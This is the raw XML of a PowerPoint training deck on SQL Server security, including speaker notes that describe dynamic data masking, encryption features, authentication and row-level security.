
<file path=[Content_Types].xml><?xml version="1.0" encoding="utf-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="bin"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embeddings/oleObject1.bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/>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embeddings/oleObject2.bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/>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embeddings/oleObject3.bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/>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0" r:id="rId5"/>
    <p:sldMasterId id="2147483737" r:id="rId6"/>
    <p:sldMasterId id="2147483767" r:id="rId7"/>
    <p:sldMasterId id="2147483794" r:id="rId8"/>
    <p:sldMasterId id="2147483816" r:id="rId9"/>
    <p:sldMasterId id="2147483838" r:id="rId10"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId63"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="293" r:id="rId11"/>
    <p:sldId id="294" r:id="rId12"/>
    <p:sldId id="258" r:id="rId13"/>
    <p:sldId id="291" r:id="rId14"/>
    <p:sldId id="259" r:id="rId15"/>
    <p:sldId id="295" r:id="rId16"/>
    <p:sldId id="314" r:id="rId17"/>
    <p:sldId id="340" r:id="rId18"/>
    <p:sldId id="351" r:id="rId19"/>
    <p:sldId id="352" r:id="rId20"/>
    <p:sldId id="356" r:id="rId21"/>
    <p:sldId id="355" r:id="rId22"/>
    <p:sldId id="358" r:id="rId23"/>
    <p:sldId id="357"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262" r:id="rId42"/>
    <p:sldId id="263" r:id="rId43"/>
    <p:sldId id="265" r:id="rId44"/>
    <p:sldId id="266" r:id="rId45"/>
    <p:sldId id="268" r:id="rId46"/>
    <p:sldId id="269" r:id="rId47"/>
    <p:sldId id="271" r:id="rId48"/>
    <p:sldId id="272" r:id="rId49"/>
    <p:sldId id="273"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4ED65AB-EF00-42E4-823D-D62316B48A81}">
          <p14:sldIdLst/>
        </p14:section>
        <p14:section name="Security" id="{20B40CF9-0FEC-4255-A6BE-537407F5C32A}">
          <p14:sldIdLst>
            <p14:sldId id="293"/>
            <p14:sldId id="294"/>
            <p14:sldId id="258"/>
            <p14:sldId id="291"/>
            <p14:sldId id="259"/>
            <p14:sldId id="295"/>
            <p14:sldId id="314"/>
            <p14:sldId id="340"/>
            <p14:sldId id="351"/>
            <p14:sldId id="352"/>
            <p14:sldId id="356"/>
            <p14:sldId id="355"/>
            <p14:sldId id="358"/>
            <p14:sldId id="357"/>
            <p14:sldId id="359"/>
            <p14:sldId id="360"/>
            <p14:sldId id="361"/>
            <p14:sldId id="362"/>
            <p14:sldId id="363"/>
            <p14:sldId id="364"/>
            <p14:sldId id="365"/>
            <p14:sldId id="366"/>
            <p14:sldId id="367"/>
            <p14:sldId id="368"/>
            <p14:sldId id="369"/>
            <p14:sldId id="370"/>
            <p14:sldId id="371"/>
            <p14:sldId id="372"/>
            <p14:sldId id="373"/>
            <p14:sldId id="374"/>
            <p14:sldId id="375"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Always Encrypted" id="{943BB1E0-BA0F-4977-9D6A-3BF0F0ABDB6F}">
          <p14:sldIdLst>
            <p14:sldId id="262"/>
            <p14:sldId id="263"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Row-Level Security" id="{562D0425-EBF8-462D-A4FF-40027CC088DE}">
          <p14:sldIdLst>
            <p14:sldId id="265"/>
            <p14:sldId id="266"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Dynamic Data Masking" id="{744EFEC4-5FE7-4714-95D7-0A9467DA7203}">
          <p14:sldIdLst>
            <p14:sldId id="268"/>
            <p14:sldId id="269"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Auditing" id="{D64CD2BC-2FDE-4C97-A7EF-85B31A550266}">
          <p14:sldIdLst>
            <p14:sldId id="271"/>
            <p14:sldId id="272"/>
            <p14:sldId id="273"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="GDPR" id="{6202D635-6B45-426E-8D33-43C14AA9A69C}">
          <p14:sldIdLst>
            <p14:sldId id="279"/>
            <p14:sldId id="280"/>
            <p14:sldId id="281"/>
            <p14:sldId id="282"/>
            <p14:sldId id="283"/>
            <p14:sldId id="284"/>
            <p14:sldId id="285"/>
            <p14:sldId id="286"/>
            <p14:sldId id="287"/>
            <p14:sldId id="288"/>
            <p14:sldId id="289"/>
            <p14:sldId id="290"/>
          </p14:sldIdLst>
        </p14:section>
      </p14:sectionLst>
    </p:ext>
    <p:ext uri="{EFAFB233-063F-42B5-8137-9DF3F51BA10A}">
      <p15:sldGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main">
        <p15:guide id="2" orient="horz" pos="568" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" orient="horz" pos="840" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" pos="3840" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="7" pos="7392" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="12" orient="horz" pos="1056" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="13" pos="7497" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="14" orient="horz" pos="1800" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="15" orient="horz" pos="2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 Lyons" initials="DL" lastIdx="98" clrIdx="0"/>
  <p:cmAuthor id="2" name="Mike MacGregor" initials="MM" lastIdx="3" clrIdx="1">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="S-1-5-21-3649012876-1825867495-937646333-5268" providerId="AD"/>
      </p:ext>
    </p:extLst>
  </p:cmAuthor>
  <p:cmAuthor id="3" name="Sumit Kumar" initials="SK" lastIdx="2" clrIdx="2">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="S-1-5-21-2127521184-1604012920-1887927527-1759458" providerId="AD"/>
      </p:ext>
    </p:extLst>
  </p:cmAuthor>
  <p:cmAuthor id="4" name="Bill Jacobs" initials="BJ" lastIdx="2" clrIdx="3">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="S-1-5-21-124525095-708259637-1543119021-1521737" providerId="AD"/>
      </p:ext>
    </p:extLst>
  </p:cmAuthor>
  <p:cmAuthor id="5" name="Mick Alberts" initials="MA" lastIdx="28" clrIdx="4">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="S-1-5-21-3649012876-1825867495-937646333-9200" providerId="AD"/>
      </p:ext>
    </p:extLst>
  </p:cmAuthor>
  <p:cmAuthor id="6" name="Robyn Schmitz" initials="RS" lastIdx="38" clrIdx="5">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="S-1-5-21-3649012876-1825867495-937646333-9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35"/>
    <a:srgbClr val="25AAE1"/>
    <a:srgbClr val="00BCF2"/>
    <a:srgbClr val="D3EEF9"/>
    <a:srgbClr val="4472C4"/>
    <a:srgbClr val="002060"/>
    <a:srgbClr val="94BEFF"/>
    <a:srgbClr val="FFB900"/>
    <a:srgbClr val="0078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724"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr>
        <p:scale>
          <a:sx n="140" d="100"/>
          <a:sy n="140" d="100"/>
        </p:scale>
        <p:origin x="144" y="64"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="568"/>
        <p:guide orient="horz" pos="840"/>
        <p:guide pos="3840"/>
        <p:guide pos="7392"/>
        <p:guide orient="horz" pos="1056"/>
        <p:guide pos="7497"/>
        <p:guide orient="horz" pos="1800"/>
        <p:guide orient="horz" pos="2520"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="1" d="1"/>
        <a:sy n="1" d="1"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:notesTextViewPr>
  <p:sorterViewPr>
    <p:cViewPr varScale="1">
      <p:scale>
        <a:sx n="100" d="100"/>
        <a:sy n="100" d="100"/>
      </p:scale>
      <p:origin x="0" y="-82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7-11-30T09:21:29.635" idx="5">
    <p:pos x="2575" y="2403"/>
    <p:text>This was incomplete. I finished it. Please review.</p:text>
    <p:extLst>
      <p:ext uri="{C676402C-5697-4E1C-873F-D02D1690AC5C}">
        <p15:threadingInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" timeZoneBias="480"/>
      </p:ext>
    </p:extLst>
  </p:cm>
  <p:cm authorId="5" dt="2017-11-30T09:28:40.847" idx="6">
    <p:pos x="3771" y="3233"/>
    <p:text>I changed this for clarity. Please review.</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7.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bin"/></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bin"/></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AE8FA-D7B2-4534-825C-89895736491D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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4323-46EB-47FD-802B-1151F9FD2B5B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="202371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zure.microsoft.com/documentation/articles/sql-database-dynamic-data-masking-get-started/"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194323-46EB-47FD-802B-1151F9FD2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60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https://msdn.microsoft.com/en-us/library/mt130841(v=sql.130).aspx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:effectLst/>
              </a:rPr>
              <a:t>Dynamic data masking limits sensitive data exposure by masking it to non-privileged users. Dynamic data masking helps prevent unauthorized access to sensitive data by enabling customers to designate how much of the sensitive data to reveal with minimal impact on the application layer. It’s a policy-based security feature that hides the sensitive data in the result set of a query over designated database fields, while the data in the database is not changed. Dynamic data masking is easy to use with existing applications, since masking rules are applied in the query results, and there is no need to modify existing queries.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:effectLst/>
              </a:rPr>
              <a:t>For example, a call center support person may identify callers by several digits of their social security number or credit card number, but those data items should not be fully exposed to the support person. A developer can define a masking rule to be applied to each query result that masks all but the last four digits of any social security number or credit card number in the result set. For another example, by using the appropriate data mask to protect personally identifiable information (PII) data, a developer can query production environments for troubleshooting purposes without violating compliance regulations.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:effectLst/>
              </a:rPr>
              <a:t>Dynamic data masking limits the exposure of sensitive data and prevents accidental viewing by engineers that access directly databases for troubleshooting purposes or non-privileged application users. Dynamic data masking doesn’t aim to prevent privileged database users from connecting directly to the database and running exhaustive queries that expose pieces of the sensitive data. Dynamic data masking is complimentary to other SQL Server security features (auditing, encryption, row level security…) and it is highly recommended to enable them in addition in order to protect better the sensitive data in the database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:effectLst/>
              </a:rPr>
              <a:t>Since data is masked just before being returned to the user, changing the data type to an unmasked type will return unmasked data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:effectLst/>
              </a:rPr>
              <a:t>Dynamic data masking is available in SQL Server 2016 .However, to enable dynamic data masking, you must use trace flags 209 and 219. For  SQL Database, see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:effectLst/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Get started with SQL Database Dynamic Data Masking (Azure Preview portal)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:effectLst/>
              </a:rPr>
              <a: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0A7F1-1D53-4645-8AB9-46355AEB7888}" type="slidenum">
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Light"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latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3754869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3D2AD-3896-4D5C-87D1-EE86FD4147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74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3D2AD-3896-4D5C-87D1-EE86FD4147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81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3D2AD-3896-4D5C-87D1-EE86FD4147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19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3D2AD-3896-4D5C-87D1-EE86FD4147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294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44682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38407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Envision 2016</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 8:47 AM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406427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71664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4897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kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>This slide is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> recommended as a final slide to recap the objectives of the workshop.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="0" kern="1200" baseline="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>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b="0" kern="1200" baseline="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="932472" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct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t>KEY TAKEAWAYS:</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="en-US" sz="900" b="1"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br>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="9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t>Bullet points highlighting the </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="900" b="0" i="1"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t>primary information </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="9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t>sellers should be able to recall from the session to help them perform in role (e.g. practical guidance, tips, suggested behavior changes.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="932472" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endPar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a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="932472" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="900" b="1"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t>ACTION ITEMS:</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="en-US" sz="900" b="1"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br>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="9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t>Next steps to </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="900" b="0" i="1"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t>put their learnings into action.</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="en-US" sz="9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br>
            <a:br>
              <a:rPr kumimoji="0" lang="en-US" sz="8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rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="900" kern="120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C64DE5-4A80-4049-BDC7-E36CCA81128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ooter Placeholder 8"/>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b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Header Placeholder 10"/>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Tech Ready 15</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="309700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3273" marR="0" lvl="0" indent="0" algn="l" defTabSz="920132"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85307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740624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704097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352361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167924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33090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70277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94323-46EB-47FD-802B-1151F9FD2B5B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="254410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8104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t>[this slide has animation]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:latin typeface="Segoe UI Light"/>
              </a:rPr>
              <a:t>SQL Server provides enterprise-grade security capabilities on Windows and on Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>[click]</a:t>
            </a:r>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We think about security for SQL Server in terms of layers. At the center, you have your data and how you protect the data itself, typically using encryption. SQL Server supports a variety of encryption features to help protect your data against different types of threats. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Transparent Data Encryption </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(TDE) encrypts your whole database at rest, without requiring any application changes. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Backup Encryption </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>encrypts your backup files, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Cell-Level Encryption </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>gives you granular control over the encryption of individual cells of data. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>To encrypt data in transit to and from the database, SQL Server supports the industry-standard </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>TLS 1.2 protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>And finally, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Always Encrypted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> enables you to encrypt sensitive data client-side, so that even privileged SQL Server administrators are unable to see it in plaintext. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>[click] </a:t>
            </a:r>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The next layer is about controlling access to the data. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SQL Authentication </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>allows users to authenticate via a username and password, while </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Active Directory Authentication </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>allows users to authenticate using single sign-on through Active Directory and Kerberos. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Granular permissions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>enable you to control access to individual tables or even columns of data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Row-Level Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>allows you to control read- and write-access to individual rows of data based on a customizable policy, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
